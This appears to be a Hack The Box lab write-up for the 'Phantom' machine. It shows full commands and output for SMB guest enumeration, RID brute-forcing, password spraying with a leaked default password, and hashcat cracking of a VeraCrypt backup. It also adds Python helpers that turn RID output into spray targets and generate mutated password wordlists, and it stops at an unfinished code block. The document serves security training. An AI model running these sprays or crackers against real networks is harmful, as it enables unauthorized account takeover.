Should you need to crack a hash, use a short custom wordlist based on company name and simple mutation rules commonly seen in real life passwords (e.g. year and a special character).
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nmap 10.129.234.63 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 09:09 EDT
Nmap scan report for 10.129.234.63
Host is up (0.37s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
50650/tcp open unknown
50651/tcp open unknown
50658/tcp open unknown
52771/tcp open unknown
52796/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 57.96 seconds
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nmap 10.129.234.63 -p 53,88,135,139,389,445,464,593,636,3268,3269,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 09:18 EDT
Nmap scan report for DC.phantom.vl (10.129.234.63)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-26 13:18:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-26T13:19:14+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2025-10-25T13:02:03
|_Not valid after: 2026-04-26T13:02:03
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| DNS_Tree_Name: phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-26T13:18:34+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-26T13:18:36
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.07 seconds
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u guest -p '' --shares
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\guest:
SMB 10.129.234.63 445 DC [*] Enumerated shares
SMB 10.129.234.63 445 DC Share Permissions Remark
SMB 10.129.234.63 445 DC ----- ----------- ------
SMB 10.129.234.63 445 DC ADMIN$ Remote Admin
SMB 10.129.234.63 445 DC C$ Default share
SMB 10.129.234.63 445 DC Departments Share
SMB 10.129.234.63 445 DC IPC$ READ Remote IPC
SMB 10.129.234.63 445 DC NETLOGON Logon server share
SMB 10.129.234.63 445 DC Public READ
SMB 10.129.234.63 445 DC SYSVOL Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# smbclient //10.129.234.63/Public -U "" -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 11 11:03:14 2024
.. DHS 0 Thu Aug 14 07:55:49 2025
tech_support_email.eml A 14565 Sat Jul 6 12:08:43 2024
6127103 blocks of size 4096. 1786592 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (34.7 KiloBytes/sec) (average 34.7 KiloBytes/sec)
smb: \> exit
Dear Tech Support Team,
I have finished the new template for the new-employee welcome email.
Please see the sample template attached. Please use this template for all new employees from now on.
Regards,
Anthony Lucas
The default password is Ph4nt0m@5t4rt!
Now all that is missing is a list of usernames.
Since guest (null) access works, enumerate users directly by brute-forcing RIDs over SAMR; the SidTypeUser names go into a file, valid_users, for the spray below.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u guest -p '' --rid-brute
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\guest:
SMB 10.129.234.63 445 DC 498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 500: PHANTOM\Administrator (SidTypeUser)
SMB 10.129.234.63 445 DC 501: PHANTOM\Guest (SidTypeUser)
SMB 10.129.234.63 445 DC 502: PHANTOM\krbtgt (SidTypeUser)
SMB 10.129.234.63 445 DC 512: PHANTOM\Domain Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 513: PHANTOM\Domain Users (SidTypeGroup)
SMB 10.129.234.63 445 DC 514: PHANTOM\Domain Guests (SidTypeGroup)
SMB 10.129.234.63 445 DC 515: PHANTOM\Domain Computers (SidTypeGroup)
SMB 10.129.234.63 445 DC 516: PHANTOM\Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 517: PHANTOM\Cert Publishers (SidTypeAlias)
SMB 10.129.234.63 445 DC 518: PHANTOM\Schema Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 519: PHANTOM\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 520: PHANTOM\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.63 445 DC 521: PHANTOM\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 522: PHANTOM\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 525: PHANTOM\Protected Users (SidTypeGroup)
SMB 10.129.234.63 445 DC 526: PHANTOM\Key Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 527: PHANTOM\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 553: PHANTOM\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.63 445 DC 571: PHANTOM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.63 445 DC 572: PHANTOM\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.63 445 DC 1000: PHANTOM\DC$ (SidTypeUser)
SMB 10.129.234.63 445 DC 1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB 10.129.234.63 445 DC 1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.63 445 DC 1103: PHANTOM\svc_sspr (SidTypeUser)
SMB 10.129.234.63 445 DC 1104: PHANTOM\TechSupports (SidTypeGroup)
SMB 10.129.234.63 445 DC 1105: PHANTOM\Server Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 1106: PHANTOM\ICT Security (SidTypeGroup)
SMB 10.129.234.63 445 DC 1107: PHANTOM\DevOps (SidTypeGroup)
SMB 10.129.234.63 445 DC 1108: PHANTOM\Accountants (SidTypeGroup)
SMB 10.129.234.63 445 DC 1109: PHANTOM\FinManagers (SidTypeGroup)
SMB 10.129.234.63 445 DC 1110: PHANTOM\EmployeeRelations (SidTypeGroup)
SMB 10.129.234.63 445 DC 1111: PHANTOM\HRManagers (SidTypeGroup)
SMB 10.129.234.63 445 DC 1112: PHANTOM\rnichols (SidTypeUser)
SMB 10.129.234.63 445 DC 1113: PHANTOM\pharrison (SidTypeUser)
SMB 10.129.234.63 445 DC 1114: PHANTOM\wsilva (SidTypeUser)
SMB 10.129.234.63 445 DC 1115: PHANTOM\elynch (SidTypeUser)
SMB 10.129.234.63 445 DC 1116: PHANTOM\nhamilton (SidTypeUser)
SMB 10.129.234.63 445 DC 1117: PHANTOM\lstanley (SidTypeUser)
SMB 10.129.234.63 445 DC 1118: PHANTOM\bbarnes (SidTypeUser)
SMB 10.129.234.63 445 DC 1119: PHANTOM\cjones (SidTypeUser)
SMB 10.129.234.63 445 DC 1120: PHANTOM\agarcia (SidTypeUser)
SMB 10.129.234.63 445 DC 1121: PHANTOM\ppayne (SidTypeUser)
SMB 10.129.234.63 445 DC 1122: PHANTOM\ibryant (SidTypeUser)
SMB 10.129.234.63 445 DC 1123: PHANTOM\ssteward (SidTypeUser)
SMB 10.129.234.63 445 DC 1124: PHANTOM\wstewart (SidTypeUser)
SMB 10.129.234.63 445 DC 1125: PHANTOM\vhoward (SidTypeUser)
SMB 10.129.234.63 445 DC 1126: PHANTOM\crose (SidTypeUser)
SMB 10.129.234.63 445 DC 1127: PHANTOM\twright (SidTypeUser)
SMB 10.129.234.63 445 DC 1128: PHANTOM\fhanson (SidTypeUser)
SMB 10.129.234.63 445 DC 1129: PHANTOM\cferguson (SidTypeUser)
SMB 10.129.234.63 445 DC 1130: PHANTOM\alucas (SidTypeUser)
SMB 10.129.234.63 445 DC 1131: PHANTOM\ebryant (SidTypeUser)
SMB 10.129.234.63 445 DC 1132: PHANTOM\vlynch (SidTypeUser)
SMB 10.129.234.63 445 DC 1133: PHANTOM\ghall (SidTypeUser)
SMB 10.129.234.63 445 DC 1134: PHANTOM\ssimpson (SidTypeUser)
SMB 10.129.234.63 445 DC 1135: PHANTOM\ccooper (SidTypeUser)
SMB 10.129.234.63 445 DC 1136: PHANTOM\vcunningham (SidTypeUser)
SMB 10.129.234.63 445 DC 1137: PHANTOM\SSPR Service (SidTypeGroup)
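The valid_users file used in the next step is built from the --rid-brute output. The parser below is an added example for that step, not the author's script: it turns nxc's RID lines into structured entries, drops machine accounts (trailing $) and accounts that are pointless to spray (krbtgt, Guest), and separately lists the groups, which are useful later when reading ACLs. The sample text is a constructed excerpt in the same format as the output above.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample in the format of the nxc --rid-brute output above
# (a handful of the lines retyped; not the full enumeration).
SAMPLE_RID_OUTPUT = r"""
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\guest:
SMB 10.129.234.63 445 DC 498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.63 445 DC 500: PHANTOM\Administrator (SidTypeUser)
SMB 10.129.234.63 445 DC 501: PHANTOM\Guest (SidTypeUser)
SMB 10.129.234.63 445 DC 502: PHANTOM\krbtgt (SidTypeUser)
SMB 10.129.234.63 445 DC 512: PHANTOM\Domain Admins (SidTypeGroup)
SMB 10.129.234.63 445 DC 1000: PHANTOM\DC$ (SidTypeUser)
SMB 10.129.234.63 445 DC 1103: PHANTOM\svc_sspr (SidTypeUser)
SMB 10.129.234.63 445 DC 1106: PHANTOM\ICT Security (SidTypeGroup)
SMB 10.129.234.63 445 DC 1112: PHANTOM\rnichols (SidTypeUser)
SMB 10.129.234.63 445 DC 1122: PHANTOM\ibryant (SidTypeUser)
"""

# One principal per line: "<proto> <ip> <port> <host> <rid>: <DOMAIN>\<name> (SidType<Kind>)"
# The name may contain spaces ("Domain Admins"), hence the lazy match up to " (SidType".
RID_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\(SidType(?P<kind>\w+)\)\s*$"
)


def parse_rid_brute(text: str) -> List[Dict[str, object]]:
    """Return one dict per enumerated principal, in output order; other lines are ignored."""
    entries: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = RID_LINE.match(line.strip())
        if m:
            entries.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "kind": m["kind"]})
    return entries


def spray_candidates(entries, skip: Iterable[str] = ("krbtgt", "Guest")) -> List[str]:
    """User accounts worth spraying: no machine accounts (trailing $), none of the skipped names."""
    skip_lower = {s.lower() for s in skip}
    return [str(e["name"]) for e in entries
            if e["kind"] == "User"
            and not str(e["name"]).endswith("$")
            and str(e["name"]).lower() not in skip_lower]


def group_names(entries) -> List[str]:
    """Groups and aliases, kept for later ACL reading (e.g. ICT Security below)."""
    return [str(e["name"]) for e in entries if e["kind"] in ("Group", "Alias")]


if __name__ == "__main__":
    import sys
    # Usage: nxc smb <ip> -u guest -p '' --rid-brute | python3 rid_users.py > valid_users
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RID_OUTPUT
    print("\n".join(spray_candidates(parse_rid_brute(text))))
```

Feed it the saved nxc output and redirect stdout to valid_users; the spray in the next step then skips krbtgt, Guest and DC$, which can never succeed and only add noise to the DC's security log.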
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u valid_users -p 'Ph4nt0m@5t4rt!' --continue-on-success
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [-] phantom.vl\Administrator:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\Guest:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\krbtgt:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\DC$:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\svc_sspr:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\rnichols:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\pharrison:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wsilva:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\elynch:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\nhamilton:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\lstanley:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\bbarnes:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cjones:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\agarcia:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ppayne:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.129.234.63 445 DC [-] phantom.vl\ssteward:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\wstewart:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vhoward:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\crose:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\twright:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\fhanson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\cferguson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\alucas:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ebryant:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vlynch:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ghall:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ssimpson:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\ccooper:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
SMB 10.129.234.63 445 DC [-] phantom.vl\vcunningham:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodhound-ce-python -c All -p 'Ph4nt0m@5t4rt!' -u ibryant -d phantom.vl -ns 10.129.234.63 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::5ca7:7042:ef92:3073
INFO: Trying LDAP connection to dead:beef::5ca7:7042:ef92:3073
INFO: Testing resolved hostname connectivity dead:beef::165
INFO: Trying LDAP connection to dead:beef::165
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::5ca7:7042:ef92:3073
INFO: Trying LDAP connection to dead:beef::5ca7:7042:ef92:3073
INFO: Testing resolved hostname connectivity dead:beef::165
INFO: Trying LDAP connection to dead:beef::165
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 00M 15S
INFO: Compressing output into 20251026095008_bloodhound.zip
Nothing useful for ibryant in BloodHound.
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-smbclient ibryant@dc.phantom.vl -dc-ip 10.129.234.63 -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
Departments Share
IPC$
NETLOGON
Public
SYSVOL
# use Departments Share
# ls
drw-rw-rw- 0 Sat Jul 6 12:25:31 2024 .
drw-rw-rw- 0 Thu Aug 14 07:55:49 2025 ..
drw-rw-rw- 0 Sat Jul 6 12:25:11 2024 Finance
drw-rw-rw- 0 Sat Jul 6 12:21:31 2024 HR
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 IT
# cd IT
# ls
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 .
drw-rw-rw- 0 Sat Jul 6 12:25:31 2024 ..
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 Backup
-rw-rw-rw- 43593728 Sat Jul 6 12:25:36 2024 mRemoteNG-Installer-1.76.20.24615.msi
-rw-rw-rw- 32498992 Sat Jul 6 12:26:59 2024 TeamViewerQS_x64.exe
-rw-rw-rw- 80383920 Sat Jul 6 12:27:15 2024 TeamViewer_Setup_x64.exe
>>>> -rw-rw-rw- 9201076 Thu Jul 11 10:59:06 2024 veracrypt-1.26.7-Ubuntu-22.04-amd64.deb
-rw-rw-rw- 86489296 Sat Jul 6 12:25:36 2024 Wireshark-4.2.5-x64.exe
# cd Backup
# ls
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 ..
>>>> -rw-rw-rw- 12582912 Sat Jul 6 14:04:34 2024 IT_BACKUP_201123.hc
The .hc extension suggests a VeraCrypt container, and the VeraCrypt 1.26.7 installer sits next to it in the IT share.
Following the hint at the top, I asked an AI to generate a small social-engineering wordlist built from the company name:
Phantom2020
Phantom2020!
Phantom2021
Phantom2021!
Phantom2023
Phantom2023!
Phantom2024
Phantom2024!
Phantom@2020
Phantom@2024
phantom2020
phantom2020!
phantom2024
phantom2024!
Backup2020
Backup2020!
Backup2021
Backup2023
Backup2024
Backup2024!
ITBackup2020
ITBackup2020!
ITBackup2021
ITBackup2024
PhantomIT2020
PhantomIT2020!
PhantomBackup2020
PhantomBackup2020!
PhantomSSPR2020
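The list above was produced by hand (via an AI prompt). The generator below is an added example, not the author's, that applies the same mutation rules from the hint (company or department stems, year suffix, one special character before or after the year, case variants, compound stems such as PhantomIT) so the list can be regenerated deterministically for another target. Base words, the year range 2020 to 2024 and the special-character set are assumptions chosen to cover the list above.

```python
import itertools
import sys
from typing import Iterable, List, Sequence

YEARS: List[str] = [str(y) for y in range(2020, 2025)]   # assumed range for a 2024-era backup
SPECIALS: List[str] = ["!", "@", "#", "$"]               # assumed set of common suffix characters


def case_variants(word: str) -> List[str]:
    """As written, all lower, all upper, Capitalised; order kept, duplicates dropped."""
    return list(dict.fromkeys([word, word.lower(), word.upper(), word.capitalize()]))


def generate_wordlist(bases: Sequence[str], years: Iterable[str] = YEARS,
                      specials: Iterable[str] = SPECIALS, min_len: int = 8,
                      compound: bool = True) -> List[str]:
    """Stems x {bare, year, year+special, special+year}, deduplicated, order preserved."""
    years, specials = list(years), list(specials)
    stems: List[str] = []
    for base in bases:
        stems.extend(case_variants(base))
    if compound:                                   # "Phantom"+"IT" -> PhantomIT, ITPhantom, ...
        for a, b in itertools.permutations(bases, 2):
            stems.extend(case_variants(a + b))
    candidates: List[str] = []
    for stem in stems:
        candidates.append(stem)
        for year in years:
            candidates.append(stem + year)                     # Phantom2023
            for sp in specials:
                candidates.append(stem + year + sp)            # Phantom2023!
                candidates.append(stem + sp + year)            # Phantom@2023
    # dedupe while keeping order; drop anything below the usual minimum length policy
    return [c for c in dict.fromkeys(candidates) if len(c) >= min_len]


if __name__ == "__main__":
    # Usage: python3 gen_wordlist.py Phantom IT Backup > passwords.txt
    print("\n".join(generate_wordlist(sys.argv[1:] or ["Phantom", "IT", "Backup"])))
```

With three stems this yields on the order of 1,500 candidates, which is still a few minutes of work against a 500,000-iteration VeraCrypt PBKDF2 at the 14 H/s seen below; keep the stem list short and add rules rather than words when the first pass misses.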
For cracking you also have to pick the hashcat mode. The VeraCrypt version is known (1.26.7, from the installer next to the backup), so I asked the AI which mode applies. One caveat: a VeraCrypt header does not reveal which PBKDF2 PRF or cipher was used, so in general you try the 137xx family (hashcat now labels these legacy and also offers the newer 294xx modes) until one cracks; here 13721 (SHA-512 PRF, single-cipher XTS 512-bit) was the right one. The status block below corresponds to a run of the form `hashcat -m 13721 IT_BACKUP_201123.hc passwords.txt`, where hashcat reads the encrypted header straight from the container file.
IT_BACKUP_201123.hc:Phantom2023!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Sun Oct 26 10:24:34 2025 (2 secs)
Time.Estimated...: Sun Oct 26 10:24:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14 H/s (1.76ms) @ Accel:128 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 29/29 (100.00%)
Rejected.........: 0/29 (0.00%)
Restore.Point....: 0/29 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499000-499999
Candidate.Engine.: Device Generator
Candidates.#1....: Phantom2020 -> PhantomSSPR2020
Hardware.Mon.#1..: Util: 52%
Started: Sun Oct 26 10:23:59 2025
Stopped: Sun Oct 26 10:24:37 2025
The container password is Phantom2023!; mounted, the volume contains:
┌──(root㉿kali)-[~/Desktop/htb/Phantom/veracrypt]
└─# ls -la
total 11196
drwxr-xr-x 2 root root 4096 Oct 26 10:28 .
drwxr-xr-x 3 root root 4096 Oct 26 10:28 ..
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_0805.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1023.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1104.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1123.json
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1003
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1102
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs1203
-rw-r--r-- 1 root root 19348 Oct 26 10:28 ticketing_system_backup.zip
-rw-r--r-- 1 root root 8191211 Oct 26 10:28 vyos_backup.tar.gz
There is a ticketing_system_backup.zip, which looks important at first glance:
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/ticketing]
└─# ls
ticketing_system_backup_0806.sql ticketing_system_backup_0910.sql ticketing_system_backup_1101.sql
ticketing_system_backup_0908.sql ticketing_system_backup_1011.sql ticketing_system_backup_1105.sql
I looked through the SQL files: nothing exploitable, just the company's ticketing-system data.
The other archive, vyos_backup.tar.gz, is a VyOS router backup; after extracting it into the same directory the listing looks like this:
┌──(root㉿kali)-[~/Desktop/htb/Phantom/veracrypt]
└─# ls -la
total 11252
drwxr-xr-x 14 root root 4096 Jul 6 2024 .
drwxr-xr-x 3 root root 4096 Oct 26 10:28 ..
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_0805.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1023.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1104.json
-rw-r--r-- 1 root root 47391 Oct 26 10:28 azure_vms_1123.json
lrwxrwxrwx 1 root root 7 Jul 5 2024 bin -> usr/bin
>>>> drwxrwsr-x 7 root messagebus 4096 Jul 6 2024 config
drwxr-xr-x 128 root root 12288 Jul 6 2024 etc
drwxr-xr-x 4 root root 4096 Jul 6 2024 home
lrwxrwxrwx 1 root root 7 Jul 5 2024 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jul 5 2024 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4096 Jul 5 2024 media
drwxr-xr-x 2 root root 4096 Jul 5 2024 mnt
drwxr-xr-x 3 root root 4096 Jul 6 2024 opt
drwx------ 4 root root 4096 Jul 6 2024 root
drwxr-xr-x 44 root root 4096 Jul 6 2024 run
lrwxrwxrwx 1 root root 8 Jul 5 2024 sbin -> usr/sbin
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1003
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs_1102
-rw-r--r-- 1 root root 1012407 Oct 26 10:28 splunk_logs1203
drwxr-xr-x 4 root root 4096 Jul 5 2024 srv
drwxr-xr-x 2 root root 4096 Oct 26 10:29 ticketing
-rw-r--r-- 1 root root 19348 Oct 26 10:28 ticketing_system_backup.zip
drwxrwxrwt 10 root root 4096 Jul 6 2024 tmp
drwxr-xr-x 13 root root 4096 Jul 5 2024 var
-rw-r--r-- 1 root root 8191211 Oct 26 10:28 vyos_backup.tar.gz
One entry stands out: config is group-owned by messagebus rather than root. On VyOS that is the configuration directory, with config.boot holding the active configuration and archive/ holding earlier revisions, so let's look inside:
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/config]
└─# tree ./
./
├── archive
│ ├── commits
│ ├── config.boot
│ ├── config.boot.0.gz
│ ├── config.boot.1.gz
│ ├── config.boot.2.gz
│ ├── config.boot.3.gz
│ ├── config.boot.4.gz
│ ├── config.boot.5.gz
│ ├── config.boot.6.gz
│ ├── config.boot.7.gz
│ ├── config.boot.8.gz
│ ├── lr.conf
│ └── lr.state
├── auth
├── config.boot
├── scripts
│ ├── vyos-postconfig-bootup.script
│ └── vyos-preconfig-bootup.script
├── support
├── user-data
└── vyos-activate.log
6 directories, 17 files
┌──(root㉿kali)-[~/…/htb/Phantom/veracrypt/config]
└─# grep 'password' ./*
grep: ./archive: Is a directory
grep: ./auth: Is a directory
./config.boot: password-protected
./config.boot: password-protected
./config.boot: encrypted-password "$6$rounds=656000$6diBtlKOC2mmpMcP$G.DyFWB.fDoVSEfQN197v8lkGZbj6AI91P39eiNYoF8ymQoK11F.mLuQ6ulUFAxPkYMxVOq.WnkBwzmEWu81H."
./config.boot: encrypted-password "$6$rounds=656000$Etl2frgw6IuOffzT$LPX5DjrOKSiVnTjPSLMnVevH4Y4eMf7SEWL6V8eH8GNUSDbFZX7Hj/jFvEGspjAtRY1lLohfGfOiraR1UGiDh."
./config.boot: plaintext-password ""
./config.boot: password "gB6XTcqVP5MlP7Rc"
grep: ./scripts: Is a directory
grep: ./support: Is a directory
grep: ./user-data: Is a directory
There is a plaintext password: gB6XTcqVP5MlP7Rc. The two encrypted-password values are sha512crypt hashes ($6$, here with 656000 rounds), which hashcat mode 1800 can attack but only slowly at that round count; the plaintext entry is the quick win. The archive/config.boot.N.gz revisions are worth the same grep, since secrets removed from the live config often survive there.
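A plain grep loses the context of each hit, which is what tells you where a password is used (a login user, a BGP neighbor, an IPsec peer). The parser below is an added example, not part of the original writeup: it walks the brace-nested config.boot syntax, records every non-empty secret leaf together with its configuration path, and tags crypt(3) hashes with the matching hashcat mode. The sample configuration is constructed; the key names it recognises are an assumption covering the common VyOS secret leaves.

```python
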